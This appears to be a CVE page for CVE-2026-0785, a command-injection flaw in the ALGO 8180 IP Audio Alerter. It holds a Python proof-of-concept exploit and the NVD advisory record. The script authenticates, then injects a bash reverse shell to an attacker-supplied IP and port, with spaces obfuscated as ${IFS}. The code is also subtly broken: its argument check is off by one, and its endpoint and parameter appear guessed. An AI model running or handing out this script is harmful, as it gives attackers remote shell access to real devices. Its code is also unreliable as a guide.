CVE-2026-0785

import requests import sys # CVE-2026-0785 PoC - ALGO 8180 IP Audio Alerter Command Injection # Target: ALGO 8180 IP Audio Alerter device # Authentication required (low privilege user) def exploit(target_ip, username, password, attacker_ip, attacker_port): """ Exploit CVE-2026-0785: API Command Injection in ALGO 8180 """ base_url = f"http://{target_ip}" # Step 1: Authentication session = requests.Session() login_data = { 'username': username, 'password': password } try: # Attempt login login_resp = session.post(f"{base_url}/api/login", data=login_data, timeout=10) if login_resp.status_code != 200: print(f"[-] Authentication failed") return False print(f"[+] Successfully authenticated") # Step 2: Command Injection via API # Malicious payload to trigger reverse shell reverse_shell = f"bash -i >& /dev/tcp/{attacker_ip}/{attacker_port} 0>&1" encoded_payload = reverse_shell.replace(' ', '${IFS}') # API endpoint for device configuration inject_data = { 'cmd': f';{encoded_payload}', 'action': 'ping' # or other vulnerable parameter } api_resp = session.post(f"{base_url}/api/system/diagnostic", data=inject_data, timeout=10) if api_resp.status_code == 200: print(f"[+] Command injection payload sent") print(f"[*] Check listener on {attacker_ip}:{attacker_port}") return True else: print(f"[-] Exploitation failed") return False except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}") return False if __name__ == "__main__": if len(sys.argv) != 5: print(f"Usage: {sys.argv[0]} <target_ip> <username> <password> <attacker_ip> <attacker_port>") sys.exit(1) target_ip = sys.argv[1] username = sys.argv[2] password = sys.argv[3] attacker_ip = sys.argv[4] attacker_port = sys.argv[5] exploit(target_ip, username, password, attacker_ip, attacker_port)

{"cve": {"id": "CVE-2026-0785", "sourceIdentifier": "[email protected]", "published": "2026-01-23T04:16:06.047", "lastModified": "2026-02-18T19:04:28.167", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ALGO 8180 IP Audio Alerter API Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of ALGO 8180 IP Audio Alerter devices. Authentication is required to exploit this vulnerability.\n\nThe specific flaw exists within the API interface. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the device. Was ZDI-CAN-28294."}, {"lang": "es", "value": "Vulnerabilidad de inyección de comandos y ejecución remota de código en la API de ALGO 8180 IP Audio Alerter. Esta vulnerabilidad permite a atacantes remotos ejecutar código arbitrario en instalaciones afectadas de dispositivos ALGO 8180 IP Audio Alerter. Se requiere autenticación para explotar esta vulnerabilidad.\n\nLa falla específica existe dentro de la interfaz de la API. El problema resulta de la falta de validación adecuada de una cadena proporcionada por el usuario antes de usarla para ejecutar una llamada al sistema. Un atacante puede aprovechar esta vulnerabilidad para ejecutar código en el contexto del dispositivo. Fue ZDI-CAN-28294."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:algosolutions:8180_ip_audio_alerter_firmware:5.5:*:*:*:*:*:*:*", "matchCriteriaId": "853BF5C9-122B-4F47-9CE7-DA3E307130ED"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:algosolutions:8180_ip_audio_alerter:-:*:*:*:*:*:*:*", "matchCriteriaId": "3A20E73F-D499-4973-ADDE-8B702E6F5254"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-26-007/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}